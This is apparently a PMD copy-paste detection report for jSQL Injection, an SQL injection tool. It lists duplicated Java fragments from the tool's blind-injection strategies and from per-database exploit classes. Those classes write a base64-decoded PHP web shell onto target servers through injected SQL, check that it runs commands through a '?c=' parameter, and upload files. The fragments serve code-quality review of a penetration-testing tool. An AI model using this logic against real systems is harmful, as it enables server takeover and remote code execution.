CPD Results
The following document contains the results of PMD's CPD 7.17.0.
Duplications
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 78 |
| com/jsql/model/injection/strategy/StrategyBlindBit.java | model | 78 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator);
this.isApplicable = this.injection.isInjectable();
if (this.isApplicable) {
LOGGER.log(
LogLevelUtil.CONSOLE_SUCCESS,
"{} [{}] injection with [{}]",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE),
this::getName,
() -> blindOperator
);
}
}
@Override
public void allow(int... i) {
this.injectionModel.appendAnalysisReport(
StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName())
+ this.injectionModel.getReportWithoutIndex(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlTestBlindWithOperator(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "<query>"), "0", true),
this.injection.getBlindOperator()
),
"metadataInjectionProcess",
null
)
);
this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
}
@Override
public void unallow(int... i) {
this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
this.injectionModel.sendToViews(new Seal.ActivateStrategy(this));
}
}
@Override
public String getPerformanceLength() {
return EngineYaml.DEFAULT_CAPACITY;
}
@Override
public String getName() {
return "Blind bin";
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 90 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 90 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
this.injectionModel.injectWithoutIndex(String.format(
this.injectionModel.getResourceAccess().getExploitDerby().getModelYaml().getFile().getCreateTable(),
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 58 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 59 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"),
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 93 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 122 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitH2.java | model | 133 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 122 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 93 |
| com/jsql/model/accessible/engine/ExploitH2.java | model | 133 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 92 |
| com/jsql/model/accessible/engine/ExploitPostgres.java | model | 500 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 122 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 61 |
| com/jsql/model/accessible/engine/ExploitH2.java | model | 98 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 61 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitH2.java | model | 98 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 91 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 43 |
| com/jsql/model/injection/strategy/StrategyBlindBit.java | model | 43 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 43 |
this.injectionModel.getMediatorEngine().getEngine().instance().getModelYaml().getStrategy().getBinary().getTest().getBin()
)) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
AbstractStrategy.FORMAT_STRATEGY_NOT_IMPLEMENTED,
this.getName(),
this.injectionModel.getMediatorEngine().getEngine()
);
return;
}
this.checkInjection(BlindOperator.OR);
this.checkInjection(BlindOperator.AND);
this.checkInjection(BlindOperator.STACK);
this.checkInjection(BlindOperator.NO_MODE);
if (this.isApplicable) {
this.allow();
this.injectionModel.sendToViews(new Seal.MessageBinary(this.injection.getInfoMessage()));
} else {
this.unallow();
}
}
private void checkInjection(BlindOperator blindOperator) throws StoppedByUserSlidingException {
if (this.isApplicable) {
return;
}
LOGGER.log(
LogLevelUtil.CONSOLE_DEFAULT,
"{} [{}] with [{}]...",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_CHECKING_STRATEGY),
this::getName,
() -> blindOperator
);
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 61 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 91 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
this.injectionModel.sendToViews(new Seal.AddTabExploitWeb(urlSuccess));
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 94 |
| com/jsql/model/injection/strategy/blind/InjectionEngine.java | model | 69 |
List<Future<CallableCharInsertion>> listTagTrue = taskExecutor.invokeAll(listCallableTagTrue);
this.injectionModel.getMediatorUtils().threadUtil().shutdown(taskExecutor);
for (var i = 1 ; i < listTagTrue.size() ; i++) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.constantTrueMark.isEmpty()) {
this.constantTrueMark = listTagTrue.get(i).get().getOpcodes();
} else {
this.constantTrueMark.retainAll(listTagTrue.get(i).get().getOpcodes());
}
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
this.initFalseMarks();
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitPostgres.java | model | 404 |
| com/jsql/model/accessible/engine/ExploitPostgres.java | model | 457 |
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
bodyExploit.replace("'", "\"")
), ResourceAccess.ADD_LOID);
if (StringUtils.isEmpty(loid)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
return StringUtils.EMPTY;
}
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
loid,
pathExploit + nameExploit
), ResourceAccess.WRITE_LOID);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | model | 81 |
| com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | model | 74 |
for (Future<CallableBlindBin> futureFalsy: futuresFalsys) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.falseDiffs.isEmpty()) {
this.falseDiffs = futureFalsy.get().getDiffsWithReference(); // Init diffs
} else {
this.falseDiffs.retainAll(futureFalsy.get().getDiffsWithReference()); // Clean un-matching diffs
}
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
if (this.injectionModel.isStoppedByUser()) {
return;
}
this.cleanTrueDiffs(injectionModel, blindOperator);
}
private void cleanTrueDiffs(InjectionModel injectionModel, BlindOperator blindOperator) {
ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().threadUtil().getExecutor("CallableGetBlindBinTagTrue");
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 95 |
| com/jsql/model/accessible/engine/ExploitMysql.java | model | 95 |
| com/jsql/model/accessible/engine/ExploitPostgres.java | model | 502 |
| com/jsql/model/accessible/engine/ExploitSqlite.java | model | 124 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitH2.java | model | 135 |
| com/jsql/model/accessible/engine/ExploitMysql.java | model | 95 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 94 |
| com/jsql/model/accessible/engine/ExploitMysql.java | model | 95 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 99 |
| com/jsql/model/injection/strategy/StrategyMultibit.java | model | 93 |
),
"metadataInjectionProcess",
null
)
);
this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
}
@Override
public void unallow(int... i) {
this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBit.java | model | 99 |
| com/jsql/model/injection/strategy/StrategyMultibit.java | model | 93 |
),
"metadataInjectionProcess",
null
)
);
this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
}
@Override
public void unallow(int... i) {
this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitH2.java | model | 82 |
| com/jsql/model/accessible/engine/ExploitH2.java | model | 117 |
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getCreateTable(),
nameTable,
nameTable, bodyExploit.replace("'", "\"")
), ResourceAccess.TBL_CREATE);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getScriptSimple(),
pathExploit + nameExploit,
nameTable
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 40 |
| com/jsql/model/accessible/engine/ExploitHsqldb.java | model | 41 |
ModelYamlDerby.class
);
}
public String createWeb(String pathExploit, String urlExploit) {
LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().propertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"),
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | model | 124 |
| com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | model | 116 |
for (Future<CallableBlindBin> futureTruthy: futuresTruthys) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.trueDiffs.isEmpty()) {
this.trueDiffs = futureTruthy.get().getDiffsWithReference(); // Init diffs
} else {
this.trueDiffs.retainAll(futureTruthy.get().getDiffsWithReference()); // Clean un-matching diffs
}
this.falseDiffs.removeAll(futureTruthy.get().getDiffsWithReference());
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
}
@Override
public CallableBlindBin getCallableBitTest(String sqlQuery, int indexChar, int bit) {
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 115 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 115 |
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
this.injectionModel.sendToViews(new Seal.ActivateStrategy(this));
}
}
@Override
public String getPerformanceLength() {
return EngineYaml.DEFAULT_CAPACITY;
}
@Override
public String getName() {
return "Blind bin";
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBit.java | model | 115 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 115 |
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
this.injectionModel.sendToViews(new Seal.ActivateStrategy(this));
}
}
@Override
public String getPerformanceLength() {
return EngineYaml.DEFAULT_CAPACITY;
}
@Override
public String getName() {
return "Blind bit";
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | model | 172 |
| com/jsql/model/injection/strategy/blind/InjectionEngine.java | model | 136 |
);
try {
blindTest.call();
} catch (Exception e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
}
return blindTest.isTrue() && !this.constantTrueMark.isEmpty();
}
public String callUrl(String urlString, String metadataInjectionProcess) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess);
}
public String callUrl(String urlString, String metadataInjectionProcess, AbstractCallableBit<?> callableBoolean) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess, callableBoolean);
}
// Getter
public String getBlankFalseMark() {
return this.blankFalseMark;
}
public List<Diff> getConstantTrueMark() {
return this.constantTrueMark;
}
}
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 97 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 97 |
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "<query>"), "0", true),
this.injection.getBlindOperator()
),
"metadataInjectionProcess",
null
)
);
this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
}
@Override
public void unallow(int... i) {
this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBit.java | model | 97 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 97 |
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "<query>"), "0", true),
this.injection.getBlindOperator()
),
"metadataInjectionProcess",
null
)
);
this.injectionModel.sendToViews(new Seal.MarkStrategyVulnerable(this));
}
@Override
public void unallow(int... i) {
this.injectionModel.sendToViews(new Seal.MarkStrategyInvulnerable(this));
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlBlind(sqlQuery, startPosition, false),
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | model | 78 |
| com/jsql/model/injection/strategy/StrategyTime.java | model | 78 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator);
this.isApplicable = this.injection.isInjectable();
if (this.isApplicable) {
LOGGER.log(
LogLevelUtil.CONSOLE_SUCCESS,
"{} [{}] injection with [{}]",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE),
this::getName,
() -> blindOperator
);
}
}
@Override
public void allow(int... i) {
this.injectionModel.appendAnalysisReport(
StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName())
+ this.injectionModel.getReportWithoutIndex(
this.injectionModel.getMediatorEngine().getEngine().instance().sqlTestBlindWithOperator(
|
||
| File | Project | Line |
|---|---|---|
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 48 |
| com/jsql/model/accessible/engine/ExploitDerby.java | model | 80 |
